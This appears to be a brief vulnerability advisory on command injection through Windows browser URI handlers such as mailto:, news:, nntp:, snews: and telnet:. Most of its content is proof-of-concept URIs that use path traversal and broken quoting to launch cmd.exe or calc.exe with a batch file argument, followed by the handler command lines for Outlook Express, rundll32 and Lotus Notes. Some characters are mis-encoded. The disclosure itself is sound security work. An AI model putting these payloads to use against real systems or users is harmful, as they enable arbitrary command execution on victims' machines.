|
Multiple Browser URI Handlers Command Injection Vulnerabilities
The following proofs of concept demonstrate this vulnerability. mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat news:windows/system32/calc.exe%20"%20-%20"%20blah.bat snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l news:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1 nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1 snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1 mailto:// C:\lotus\notes\notes.exe /defini %1 |
|
|
Privacy Statement |
